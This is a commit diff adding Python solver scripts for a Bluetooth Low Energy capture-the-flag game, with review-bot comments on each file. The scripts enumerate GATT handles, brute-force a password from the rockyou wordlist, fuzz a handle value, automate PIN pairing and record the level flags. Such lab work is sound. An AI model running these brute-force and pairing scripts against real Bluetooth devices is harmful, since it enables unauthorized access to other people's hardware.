lvl 0 - 6 complete, useful scripts added)
1 parent 8414234 commit a68a78d28bf9ad54ee3d3c593d4b609942bf735d
0xRM authored on 14 Feb 2021
Showing 17 changed files
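--- a/ctf_mac.txt
+++ b/ctf_mac.txt
@@ -0,0 +1 @@
+3c:71:bf:f1:ef:c6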
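--- a/enumerate.py
+++ b/enumerate.py
+#! /usr/bin/python
+import binascii
+import struct
+import sys, os, time
+import bluepy.btle as btle
+deviceMAC = open('ctf_mac.txt').read()
+p = btle.Peripheral(deviceMAC)
+print ("Attached to peripheral")
+services=p.getServices()
+for service in services:
+    print (service)
+    q = service.getCharacteristics()
+    for characteristic in q:
+        hex1 = int(format(characteristic.getHandle(),'02X'), 16)
+        if (characteristic.supportsRead()):
+            hex2 = binascii.b2a_hex(p.readCharacteristic(hex1))
+            hexlif2 = binascii.unhexlify(hex2)
+            print (str(hex1)+" 0x"+ format(characteristic.getHandle(),'02X') +" "+ characteristic.propertiesToString() + " " + hexlif2)
+        else:
+            print (str(hex1)+" 0x"+ format(characteristic.getHandle(),'02X') +" "+ characteristic.propertiesToString() )
+p.disconnect()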
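Review bot: A single ATT error on one characteristic aborts the whole walk, because `p.readCharacteristic(hex1)` on the readable branch is unguarded; on a target that mixes freely readable handles with ones that return "insufficient authentication/encryption", the resulting BTLEException stops the enumeration partway and skips `p.disconnect()`. Wrap the read in `try: ... except btle.BTLEException as e:` and print the handle together with the error so the table stays complete, and move `p.disconnect()` into a `finally:`. `open('ctf_mac.txt').read()` is never stripped, so a trailing newline in ctf_mac.txt would be passed straight into the connect command — `.read().strip()` avoids that. The `int(format(characteristic.getHandle(),'02X'), 16)` round trip is just `characteristic.getHandle()`.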
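--- a/enumerate.sh
+++ b/enumerate.sh
@@ -0,0 +1,2 @@
+#!/bin/bash
+bleah -b `cat ctf_mac.txt` -e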
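Review bot: The backtick substitution on line 39 is unquoted, so any stray whitespace in ctf_mac.txt would be split into separate arguments to bleah; `bleah -b "$(cat ctf_mac.txt)" -e` is the safer and more readable form. Adding `set -euo pipefail` after the shebang makes a missing ctf_mac.txt fail loudly instead of handing bleah an empty `-b` value.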
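--- a/level_04.py
+++ b/level_04.py
+#! /usr/bin/python
+import binascii
+import struct
+import sys, os, time
+import bluepy.btle as btle
+'''
+42 0x2A READ Handle 0x002C takes value AABBCCDDEEFF. Fuzz a varient of this to find the flag!
+44 0x2C NOTIFY WRITE
+46 0x2E READ WRITE write here to goto to scoreboard
+'''
+
+deviceMAC = open('ctf_mac.txt').read()
+p = btle.Peripheral(deviceMAC)
+svc=p.getServiceByUUID(0x00FF)
+print ("Attached to peripheral")
+
+print("Loading level 04")
+hex1 = binascii.unhexlify(str('%0*x' % (4,2)))
+p.writeCharacteristic(0x30, hex1, withResponse=False)
+
+password = "AABBCCDDEEFF"
+
+sys.stdout.write("\rTrying: %s " % password.rstrip())
+response = p.writeCharacteristic(0x2C, password.rstrip(), withResponse=True)
+while True:
+    if p.waitForNotifications(1.0):
+        # handleNotification() was called
+        continue
+    print "Waiting..."
+#hex1 = p.readCharacteristic(0x2C)
+#hex2 = binascii.b2a_hex(hex1)
+#hexlif2 = str(binascii.unhexlify(hex2))
+class MyDelegate(btle.DefaultDelegate):
+    def __init__(self, params):
+        btle.DefaultDelegate.__init__(self)
+        # ... initialise here
+
+    def handleNotification(self, cHandle, data):
+        # ... perhaps check cHandle
+        # ... process 'data'
+        print("Data: "+data)
+
+p.disconnect()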
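Review bot: The level selector on line 60 writes value 2 (`'%0*x' % (4,2)`) while the message says "Loading level 04", so this script loads the wrong level; it should be `(4,4)`. The notification path cannot work as written either: `MyDelegate` is defined after the `while True` loop that waits on it, it is never registered via `p.setDelegate(...)`, and nothing enables notifications by writing `b"\x01\x00"` to the CCCD, so `waitForNotifications` never returns True and the loop never exits — `p.disconnect()` is unreachable. The candidate is also sent as the ASCII string `"AABBCCDDEEFF"` rather than the `binascii.unhexlify(...)` bytes that lvl_04.py in this same commit sends. This looks like a superseded draft of lvl_04.py; if it stays in the repo it should say so in the header docstring, otherwise it should be deleted.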
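--- a/load_level.py
+++ b/load_level.py
+#! /usr/bin/python
+import binascii
+import struct
+import sys, os, time
+import bluepy.btle as btle
+chall_uuid = 0x30
+board_uuid = 0x2e
+score_uuid = 0x00ff
+
+if len(sys.argv) != 2:
+    print "Requires level no.:", sys.argv[0], "<0-9 or \"s\" for scoreboard>"
+    quit()
+
+deviceMAC = open('ctf_mac.txt').read()
+p = btle.Peripheral(deviceMAC)
+#p.connect(deviceMAC, "public")
+if( sys.argv[1] == "s"):
+    # load scroebaord... hopefully
+    print("Loading scoreboard")
+    #deviceMAC = open('ctf_mac.txt').read()
+    #p = btle.Peripheral(deviceMAC)
+    response = p.writeCharacteristic(board_uuid, "fuck you")
+else:
+    level = int(sys.argv[1])
+    level_hex = str('%0*x' % (4,level))
+    print level_hex
+
+
+    #print ("Attached to peripheral")
+    #services = p.getServiceByUUID(score_uuid)
+    #char = services.getCharacteristics(chall_uuid)[0]
+
+    print("Loading level")
+    #char.write(level_hex)
+    hex1 = binascii.unhexlify(level_hex)
+    response = p.writeCharacteristic(chall_uuid, hex1)
+
+print("If error try again...it takes a few attempts, BLE is a bit crap")
+p.disconnect()
+time.sleep(1)
+p = btle.Peripheral(deviceMAC)
+
+scoreboard = p.getServiceByUUID(score_uuid)
+q = scoreboard.getCharacteristics()
+scoreboard = p.getServiceByUUID(score_uuid)
+q = scoreboard.getCharacteristics()
+for characteristic in q:
+    hex1 = int(format(characteristic.getHandle(),'02X'), 16)
+    if (characteristic.supportsRead()):
+        #hex2 = binascii.b2a_hex(p.readCharacteristic(hex1))
+        #hexlif2 = binascii.unhexlify(hex2)
+        hexlif2 = characteristic.read()
+        print (str(hex1)+" 0x"+ format(characteristic.getHandle(),'02X') +" "+ characteristic.propertiesToString() + " " + hexlif2)
+    else:
+        print (str(hex1)+" 0x"+ format(characteristic.getHandle(),'02X') +" "+ characteristic.propertiesToString() )
+p.disconnect()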
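Review bot: `int(sys.argv[1])` on line 112 is unchecked, so a non-numeric or out-of-range argument ends in a raw ValueError or a level write the usage text does not promise; `if not sys.argv[1].isdigit() or not 0 <= int(sys.argv[1]) <= 9:` followed by the existing usage message would enforce the `<0-9 or "s">` contract. Indentation is lost in this view, so make sure lines 121–124 sit inside the `else:` branch — at top level the `s` path would reach `level_hex` undefined and raise NameError. Lines 131–132 are repeated verbatim on 133–134; one `getServiceByUUID`/`getCharacteristics` pair is enough. Neither `p.disconnect()` runs if a BTLEException is raised in between, so each connect/disconnect pair belongs in a `try/finally`, and `board_uuid`/`chall_uuid` are ATT handles, not UUIDs, which the names should say.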
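--- a/lvl_00.py
+++ b/lvl_00.py
+#! /usr/bin/python
+import binascii
+import struct
+import sys, os, time
+import bluepy.btle as btle
+'''
+simply follow the example https://github.com/hackgnar/ble_ctf_infinity
+to ensure know how to read and write to charachteristics and know the basics of how to navigate the game
+understand GATT services, charachteristics and handles.. the basics.
+'''
+
+deviceMAC = open('ctf_mac.txt').read()
+p = btle.Peripheral(deviceMAC)
+print ("Attached to peripheral")
+
+handle = "0x2e"
+content = "12345678901234567890"
+
+print("Sending \"12345678901234567890\" to 0x2e")
+
+services=p.getServices()
+
+hex_int = int(handle, 16)
+hex1 = binascii.hexlify(handle)
+response = p.writeCharacteristic(hex_int, content, True)
+print("Done")
+
+p.disconnect()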
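Review bot: `services=p.getServices()` on line 168 and `hex1 = binascii.hexlify(handle)` on line 171 are computed and never used, and `hex1` is the hex encoding of the string `"0x2e"`, not of the handle, which obscures the intent; drop both and keep only `hex_int = int(handle, 16)`. `p.disconnect()` is skipped when `writeCharacteristic` raises, so wrap the write as `try: response = p.writeCharacteristic(hex_int, content, True)` / `finally: p.disconnect()`. The prose triple-quoted string on lines 153–157 sits after the imports and is a bare expression rather than a module docstring; move it to the top of the file so tooling picks it up.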
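--- a/lvl_01.py
+++ b/lvl_01.py
+#! /usr/bin/python
+import binascii
+import struct
+import sys, os, time
+import bluepy.btle as btle
+'''
+42 0x2A READ goodbye 👋
+
+fc3fd58dcdad9ab23fac
+'''
+
+deviceMAC = open('ctf_mac.txt').read()
+p = btle.Peripheral(deviceMAC)
+svc=p.getServiceByUUID(0x00FF)
+print ("Attached to peripheral")
+
+print("Loading level 1")
+hex1 = binascii.unhexlify(str('%0*x' % (4,1)))
+p.writeCharacteristic(0x30, hex1, withResponse=False)
+
+
+print("Reading value")
+hex1 = p.readCharacteristic(0x2C)
+hex2 = binascii.b2a_hex(hex1)
+hexlif2 = str(binascii.unhexlify(hex2))
+print("Flag: %s" % hexlif2)
+
+p.disconnect()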
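Review bot: The level load on line 197 uses `withResponse=False` and the flag is read from 0x2C a few lines later, so the read can race the unacknowledged write and return the previous level's value — load_level.py in this same commit already remarks that loads "take a few attempts". Use `p.writeCharacteristic(0x30, hex1, withResponse=True)` so the peripheral has acknowledged the level switch before the read. `binascii.unhexlify(binascii.b2a_hex(hex1))` on lines 202–203 is the identity, so `flag = p.readCharacteristic(0x2C)` is all that is needed, and `svc` on line 192 is unused. Put `p.disconnect()` in a `finally:` so a failed read still releases the connection.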
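--- a/lvl_02.py
+++ b/lvl_02.py
+#! /usr/bin/python
+import binascii
+import struct
+import sys, os, time
+import bluepy.btle as btle
+'''
+42 0x2A READ WRITE Enter password here. Use rockyou.
+44 0x2C READ
+46 0x2E READ WRITE write here to goto to scoreboard
+
+password1234 - eca7d1f3cf60a8b5344a
+'''
+
+rockyou = "/opt/SecLists/Passwords/Leaked-Databases/rockyou.txt"
+
+deviceMAC = open('ctf_mac.txt').read()
+p = btle.Peripheral(deviceMAC)
+svc=p.getServiceByUUID(0x00FF)
+print ("Attached to peripheral")
+
+print("Loading level 02")
+hex1 = binascii.unhexlify(str('%0*x' % (4,2)))
+p.writeCharacteristic(0x30, hex1, withResponse=False)
+
+with open(rockyou) as f:
+    for password in f:
+        sys.stdout.write("\rTrying: %s " % password.rstrip())
+        response = p.writeCharacteristic(0x2A, password.rstrip(), withResponse=True)
+        hex1 = p.readCharacteristic(0x2C)
+        hex2 = binascii.b2a_hex(hex1)
+        hexlif2 = str(binascii.unhexlify(hex2))
+        if hexlif2 <> "":
+            print "\rPassword Found: %s" % password.rstrip()
+            print "Flag: %s" % hexlif2
+            break;
+p.disconnect()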
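Review bot: The loop on lines 235–244 has no error handling, so one BTLEException (a dropped connection, or a rockyou entry the peripheral rejects) aborts the run with no record of how far it got, and `p.disconnect()` is never reached; catch `btle.BTLEException` per candidate, reconnect, and print the last attempted line so the run can be resumed from there. `hexlif2 <> ""` on line 241 is Python 2-only syntax (`!=`), and the `b2a_hex`/`unhexlify` round trip on 239–240 is the identity, so the check reduces to `if hex1:`. The rockyou path is hard-coded; taking it from `sys.argv` with the current value as the default keeps the script usable off this one box. That any non-empty read of 0x2C means success is inferred from the level text rather than verified — worth stating in a comment.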
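--- a/lvl_03.py
+++ b/lvl_03.py
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+from __future__ import print_function # import print from python3: end=""
+import time
+import re
+import pexpect # sudo apt-get install python-pexpect
+import subprocess
+import random
+import binascii
+import struct
+import sys, os, time
+import bluepy.btle as btle
+
+'''
+Service <uuid=Heart Rate handleStart=40 handleEnd=65535>
+42 0x2A READ Connect with pin 0000. Try using bluetoothctl
+
+b46fa238cf820d0f60c1
+'''
+
+# !!! make sure bluetoothd runs in --compat mode before executing this script !!!
+def pair_with_pin(start_time, pin, time_limit=60): # int(time.time()), pin - \d{4}, time_limit - approximate pairing window time in seconds, it might take up to 2x (nested timeout conditions)
+    "exectutes pairing with entered PIN on bluetooth adapter side"
+    try:
+
+        newpid = os.fork()
+        if newpid == 0:
+            '''
+            Start bluepy stuff
+            '''
+            subprocess.call(['hciconfig','hci0','down'])
+            subprocess.call(['hciconfig','hci0','up'])
+
+            deviceMAC = open('ctf_mac.txt').read()
+            p = btle.Peripheral(deviceMAC)
+            svc=p.getServiceByUUID("0000180d-0000-1000-8000-00805f9b34fb")
+            print ("Attached to peripheral")
+            hex1 = p.readCharacteristic(0x2C)
+            hex2 = binascii.b2a_hex(hex1)
+            hexlif2 = str(binascii.unhexlify(hex2))
+            print("Flag: "+hexlif2)
+            p.disconnect()
+            exit()
+        else:
+            '''
+            Start actual pair stuff
+            '''
+            subprocess.call(['hciconfig','hci0','sspmode', '0'])
+            # bluetoothctl
+            child = pexpect.spawn('bluetoothctl')
+            child.logfile = open("/tmp/mylog", "w")
+            child.expect("#")
+            child.sendline('agent off') # might be unnecessary
+            #child.sendline('scan on') # might be unnecessary
+            child.expect("unregistered")
+            child.sendline('agent KeyboardDisplay ')
+            child.expect("Agent registered")
+            child.sendline('pairable on')
+            child.expect("pairable on succeeded")
+            child.sendline('discoverable on')
+            child.expect("discoverable on succeeded")
+            child.sendline('default-agent')
+            child.sendline('remove 3c:71:bf:f1:ef:c6')
+            child.sendline('pair 3c:71:bf:f1:ef:c6')
+
+            child.expect('Request passkey', timeout = time_limit ) # timeout <= PAIRING_TIME_LIMIT to keep some kind of logic
+            print ('Sending PIN: ' + pin)
+            child.sendline(pin)
+            i = child.expect(['Paired: yes', 'Enter passkey:'], timeout = time_limit)
+            if i == 0: # found 'Paired: yes' == successful pairing
+                trust_mac = 'trust ' + re.search(r'(?:[0-9a-fA-F]:?){12}.+$', child.before).group(0) # extract MAC from last line, one with 'Paired: Yes'
+                child.sendline(trust_mac) # optionally add device to trusted
+                child.expect('trust succeeded', timeout = 10)
+                pairing_status = True
+            else: # i == 1
+                print('wrong PIN, retrying if time will allow')
+    except pexpect.EOF:
+        print ('!!!!!!!! EOF')
+    except pexpect.TIMEOUT:
+        print ('!!!!!!!! TIMEOUT')
+    # hide Pi's bluetooth for security reasons
+    child.sendline('pairable off')
+    child.expect("pairable off succeeded")
+    child.sendline('discoverable off')
+    child.expect("discoverable off succeeded")
+    child.close()
+    return pairing_status
+
+#main program body
+PAIRING_TIME_LIMIT = 60
+BT_PIN = "0000" # random.randint(1000,10000) # generate random 4-digit PIN 1000..9999
+
+deviceMAC = open('ctf_mac.txt').read()
+p = btle.Peripheral(deviceMAC)
+svc=p.getServiceByUUID(0x00FF)
+print ("Attached to peripheral")
+
+print("Loading level 02")
+hex1 = binascii.unhexlify(str('%0*x' % (4,3)))
+p.writeCharacteristic(0x30, hex1, withResponse=False)
+
+p.disconnect()
+
+status = pair_with_pin(int(time.time()), str(BT_PIN), PAIRING_TIME_LIMIT)
+if status == True:
+    print('Pairing successful')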
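Review bot: `pairing_status` on line 335 is only assigned on the `Paired: yes` branch (line 322), so a wrong PIN, a timeout or an EOF falls through to `return pairing_status` and raises UnboundLocalError instead of returning False; initialise `pairing_status = False` at the top of `pair_with_pin`. The forked child on lines 275–291 ends with `exit()`, which raises SystemExit — and if bluepy raises before that, the child lands in the same `except` handlers, runs the parent's bluetoothctl teardown on a `child` it never created, and then continues into the main body; give the child its own `try/finally` ending in `os._exit(0)`. `child.logfile = open("/tmp/mylog", "w")` writes the whole bluetoothctl transcript, PIN included, to a fixed path that is typically world-readable under the default umask; use `tempfile.NamedTemporaryFile` or `os.open(path, os.O_WRONLY | os.O_CREAT, 0o600)`. Lines 311–312 hard-code the MAC that every other script reads from ctf_mac.txt, and the "Loading level 02" message on line 346 actually writes level 3.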
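--- a/lvl_04.py
+++ b/lvl_04.py
+#! /usr/bin/python
+import binascii
+import struct
+import sys, os, time
+import bluepy.btle as btle
+import itertools
+'''
+42 0x2A READ Handle 0x002C takes value AABBCCDDEEFF. Fuzz a varient of this to find the flag!
+44 0x2C NOTIFY WRITE
+46 0x2E READ WRITE write here to goto to scoreboard
+
+Flag: f401f21d02fdd0a4fc00
+'''
+
+notificationData = ""
+
+class MyDelegate(btle.DefaultDelegate):
+    def __init__(self, hndl):
+        btle.DefaultDelegate.__init__(self)
+        self.hndl=hndl;
+
+    def handleNotification(self, cHandle, data):
+        global notificationData
+        notificationData = data
+        #print("d: "+data)
+
+deviceMAC = open('ctf_mac.txt').read()
+p = btle.Peripheral(deviceMAC)
+
+print ("Attached to peripheral")
+
+print("Loading level 04")
+hex1 = binascii.unhexlify(str('%0*x' % (4,4)))
+p.writeCharacteristic(0x30, hex1, withResponse=False)
+p.disconnect()
+
+'''
+# of course not, this brute-force would make sense!
+charset = "01234565789ABCDEF"
+generator = itertools.chain.from_iterable((''.join(l)
+for l in itertools.product(charset, repeat=i))
+for i in range(4,5))
+'''
+
+'''
+# not this!
+print("Generating wordlist")
+charset = "01234565789ABCDEF"
+generator = itertools.chain.from_iterable((''.join(l)
+for l in itertools.product(charset, repeat=i))
+for i in range(12,13))
+'''
+
+print("Generating wordlist")
+generator = list()
+charset = list("0123456789ABCDEF")
+origPass = list("AABBCCDDEEFF")
+for x in range(len(origPass)):
+    newPass = list("AABBCCDDEEFF")
+    for y in range(len(charset)):
+        newPass = list("AABBCCDDEEFF")
+        newPass[x] = charset[y]
+        generator.append("".join(newPass))
+
+for password in generator:
+    hexlif2 = binascii.unhexlify(password)
+    hexlif2 = str(hexlif2)
+
+    deviceMAC = open('ctf_mac.txt').read()
+    p = btle.Peripheral(deviceMAC)
+
+    try:
+        srvs = (p.getServices());
+        chs=srvs[2].getCharacteristics();
+        ch=chs[1];
+        cccd = ch.valHandle + 1
+        #print(str(ch)+str(ch.propertiesToString())); # print charchteristic's properties i.e. READ, WRITE, NOTIFY
+
+        p.setDelegate(MyDelegate(ch.getHandle()));
+        svc=p.getServiceByUUID(0x00FF)
+        p.writeCharacteristic(cccd, b"\x01\x00");
+
+        sys.stdout.write("\rTrying: %s" % password.rstrip())
+        response = p.writeCharacteristic(0x2C, hexlif2)
+
+        gotResponse = False
+        while gotResponse == False:
+            if p.waitForNotifications(1.0):
+                rsp = notificationData
+                hex = binascii.b2a_hex(rsp)
+                hexstr = str(hex).strip("0").upper()
+                #sys.stdout.write(" Response: " + hexstr) # for debugging
+                if(password.strip("0") != hexstr):
+                    print(" Flag: %s" % notificationData.rstrip())
+                    exit()
+                else:
+                    gotResponse = True
+                continue
+            print "Waiting..."
+    finally:
+        p.disconnect()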
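Review bot: The `while gotResponse == False` loop on lines 444–456 has no upper bound, so a candidate for which the peripheral sends no notification leaves the script printing "Waiting..." forever instead of moving on; count the `waitForNotifications(1.0)` timeouts and `break` after a handful (`for _ in range(5):` in place of the open loop). `srvs[2]`/`chs[1]` on lines 431–432 assume a fixed service and characteristic order, even though `getServiceByUUID(0x00FF)` on line 437 already resolves the service robustly — take `svc.getCharacteristics()` and select the entry whose handle is 0x2C instead. `notificationData` is a module global that is never cleared between candidates, so a late notification from the previous connection could be compared against the next candidate; reset it to `""` before each write. The generated list also contains the unchanged `AABBCCDDEEFF` once per position, twelve wasted connections that `if newPass[x] != origPass[x]` would skip.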
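--- a/lvl_05.py
+++ b/lvl_05.py
+#! /usr/bin/python
+import binascii
+import struct
+import sys, os, time
+import bluepy.btle as btle
+'''
+42 0x2A READ find a valid write value in this pcap to use below
+44 0x2C READ WRITE https://github.com/hackgnar/ble_ctf_infinity/blob/master/gatt_servers/pcap_write/write_sample.pcap
+46 0x2E READ WRITE write here to goto to scoreboard
+
+84cf61c35b2d9c92217d
+'''
+
+deviceMAC = open('ctf_mac.txt').read()
+p = btle.Peripheral(deviceMAC)
+svc=p.getServiceByUUID(0x00FF)
+print ("Attached to peripheral")
+
+print("Loading level 05")
+hex1 = binascii.unhexlify(str('%0*x' % (4,5)))
+p.writeCharacteristic(0x30, hex1, withResponse=False)
+
+print("Sending \"121212121222\" to 0x2c")
+
+services=p.getServices()
+
+hexlif2 = binascii.unhexlify("121212121222")
+hexlif2 = str(hexlif2)
+response = p.writeCharacteristic(0x2C, hexlif2, True)
+
+print("Reading value")
+hex1 = p.readCharacteristic(0x2C)
+hex2 = binascii.b2a_hex(hex1)
+hexlif2 = str(binascii.unhexlify(hex2))
+print("Flag: %s" % hexlif2)
+
+p.disconnect()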
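Review bot: Lines 493–495 read the flag and then apply `binascii.unhexlify(binascii.b2a_hex(hex1))`, which is the identity, and `str(binascii.unhexlify("121212121222"))` on 488–489 is likewise just the bytes; `payload = binascii.unhexlify("121212121222")` and `flag = p.readCharacteristic(0x2C)` say what is meant and reuse fewer names. `svc` (line 477) and `services` (line 486) are unused. The value `121212121222` is presented as coming from the referenced pcap, but nothing here records which frame it was taken from — a comment naming the packet (or pointing at the `lvl_05_solution.png` added in this commit) would make the write-up reproducible. `p.disconnect()` should sit in a `finally:` so a failed write or read still releases the connection.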
lvl_05_solution.png 0 → 100644
lvl_06.py 0 → 100755
notes.txt 0 → 100644
reset_scoreboard.py 0 → 100755
send2handle.py 0 → 100755
submit_flag.py 0 → 100755